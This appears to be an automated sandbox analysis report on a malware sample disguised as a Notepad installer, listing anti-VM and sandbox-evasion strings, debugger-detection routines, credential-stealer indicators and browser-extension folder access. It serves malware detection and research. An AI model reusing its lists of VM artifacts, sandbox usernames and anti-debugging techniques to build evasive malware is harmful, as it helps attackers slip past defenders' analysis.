              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_006EC7A0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: DIR_WATCH.DLL
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: QEMU-GA.EXE
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SBIEDLL.DLL
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: API_LOG.DLL
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PARTIAL RECORD WITHOUT END(1)PARTIAL RECORD WITHOUT END(2)MISSING START OF FRAGMENTED RECORD(1)MISSING START OF FRAGMENTED RECORD(2)ERROR IN MIDDLE OF RECORDUNKNOWN RECORD TYPE %UCHECKSUM MISMATCHBAD RECORD LENGTHKERNEL32.DLLEXITPROCESS/BIN/RUNTIME.EXERTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYISWOW64PROCESS\GLOBAL??ASWHOOK.DLLKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTIONV1.0.3705GETREQUESTEDRUNTIMEINFOGETCORVERSIONCORBINDTORUNTIMECLRCREATEINSTANCEWKSCORBINDTORUNTIMEEXV4.0.30319V2.0.50727MSCOREE.DLL%PCOMMANDLINECURRENTDIRECTORY"%S" %S"%S"CREATEWIN32_PROCESSROOT\CIMV2RUNAS.EXE.EXEDUMPFINDSTRICMPPRINTTOSTRING?.\;@%SCJSONWINREGMESSAGEPACKPRELOADPACKAGE_GFRAMEWORKLOADEDDECRYPT_UTF8SEND_DATAREG_EXPORTGCREADFILEGET_ARCHPS_GETPATHSET_COMMITADD_FILEADD_STREAMPATH_EXISTFILE_EXISTPARSE_PATHFS_SEARCHNAMEFILENAMEFILESIZEHIGHFILESIZELOW%S\%S...%S\*.*
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;*!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;*!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORVIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE.EXEVMWAREUSER.EXEVMWARETRAY.EXEVMTOOLSD.EXEVMWAREVMWAREVDSERVICE.EXEVDAGENT.EXEQEMU-GA.E
              Source: Notteppad_SettupX32iX64.exe, Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6EXITPROCESSKERNEL32.DLL/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTION\GLOBAL??ASWHOOK.DLL/BIN/RUNTIME.EXEGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZRTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/AMD64/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/BIN/AMD64/COREDLL.BIN/BIN/AMD64/STUBMOD.BIN
              Contain functionality to detect virtual machines
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: qemu-ga qemu-ga 0_2_006EC425
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vbox VBOX 0_2_006EC00E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: qemu qemu QEMU QEMU 0_2_006EC4B1
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 0_2_006EB48F
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: qemu qemu vmware vbox 0_2_006EB17A
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 0_2_006EB534
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vboxvideo VBoxVideoW8 VBoxWddm 0_2_006EBDC6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vmtoolsd.exe vmwaretray.exe vmwareuser.exe 0_2_006EC1AC
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: VBOX VBOX VEN_VBOX 0_2_006EB987
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 0_2_006EB649
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vbox vmware qemu qemu 0_2_006EAAA5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: VBoxTrayToolWndClass VBoxTrayToolWnd 0_2_006EB6B1
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: VMWare QEMU QEMU 0_2_006EAF27
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe 0_2_006EB722
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: qemu-ga.exe qemu-ga.exe 0_2_006EC3E5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: VMwareVMware VBoxVBoxVBox 0_2_006EABFE
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: QEMU QEMU 0_2_006EC386
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: vbox VBOX 0_2_006EBF95
              Contains functionality to detect virtual machines (IN, VMware)
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EC2FF in eax, dx0_2_006EC2FF
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA998 str word ptr [eax]0_2_006EA998
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9100 sidt fword ptr [ebp-08h]0_2_006E9100
              Source: C:\Windows\System32\rundll32.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-13681
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EAAA5 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,StrStrIW,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,LocalFree,LocalAlloc,StrStrIW,StrStrIW,StrStrIW,StrStrIW,SetupDiEnumDeviceInfo,LocalFree,SetupDiDestroyDeviceInfoList,GetLastError,GetLastError,GetLastError,0_2_006EAAA5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E910E sgdt fword ptr [ebp-08h]0_2_006E910E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9C88 GetSystemInfo,GetModuleHandleExW,GetCurrentProcess,GetModuleInformation,VirtualQuery,VirtualQuery,0_2_006E9C88
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_00409BB0 FindFirstFileA,GetLastError,_errno,_errno,_errno,_errno,_errno,_errno,0_2_00409BB0
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1828C FindFirstFileW,FindNextFileW,1_2_00007DF4B3C1828C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1782C FindFirstFileW,FindNextFileW,FindClose,1_2_00007DF4B3C1782C
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vboxtray.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMware
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vmwaretray.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vmtoolsd.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: qemu-ga.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: \\.\VBoxMiniRdrDN
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: VBoxTrayToolWnd
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: \\.\VBoxTrayIPC
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink2;
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: VBoxTrayToolWndClass
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: \\.\pipe\VBoxTrayIPC
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\drivers\VBoxMouse.sys
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\vboxhook.dll
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\vboxmrxnp.dll
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vmwareuser.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: qemu-ga
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\drivers\VBoxGuest.sys
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vmware
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink>;
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorvirtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService.exevmwareuser.exevmwaretray.exevmtoolsd.exeVMwareVMWAREvdservice.exevdagent.exeqemu-ga.e
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxService
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
              Source: rundll32.exe, 00000001.00000003.270774106.0000025AA3A90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: VMWare
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\vboxservice.exe
              Source: rundll32.exe, 00000001.00000003.270774106.0000025AA3A90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: \\.\VBoxGuest
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: vboxservice.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\vboxtray.exe
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
              Source: Notteppad_SettupX32iX64.exeBinary or memory string: System32\drivers\VBoxSF.sys

              Anti Debugging

              barindex
              Found API chain indicative of debugger detection
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-13963
              Contains functionality to hide a thread from the debugger
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9AB8 NtSetInformationThread 0000FFFF,00000011,00000000,000000000_2_006E9AB8
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9587 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_006E9587
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA247 VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualFree,IsDebuggerPresent,GetWriteWatch,VirtualFree,VirtualFree,VirtualFree,0_2_006EA247
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9769 VirtualProtect 00000000,?,00000140,?0_2_006E9769
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9BAA SetLastError,OutputDebugStringW,GetLastError,0_2_006E9BAA
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_006EC7A0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004029FB GetModuleHandleW,strlen,GetProcessHeap,HeapFree,NtProtectVirtualMemory,0_2_004029FB
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E86CB mov eax, dword ptr fs:[00000030h]0_2_006E86CB
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA46B mov eax, dword ptr fs:[00000030h]0_2_006EA46B
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E956D mov eax, dword ptr fs:[00000030h]0_2_006E956D
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA954 mov eax, dword ptr fs:[00000030h]0_2_006EA954
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9E7E mov eax, dword ptr fs:[00000030h]0_2_006E9E7E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9E7E mov eax, dword ptr fs:[00000030h]0_2_006E9E7E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E5E73 mov eax, dword ptr fs:[00000030h]0_2_006E5E73
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9ECF mov eax, dword ptr fs:[00000030h]0_2_006E9ECF
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9ECF mov eax, dword ptr fs:[00000030h]0_2_006E9ECF
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E0300 LdrInitializeThunk,0_2_006E0300
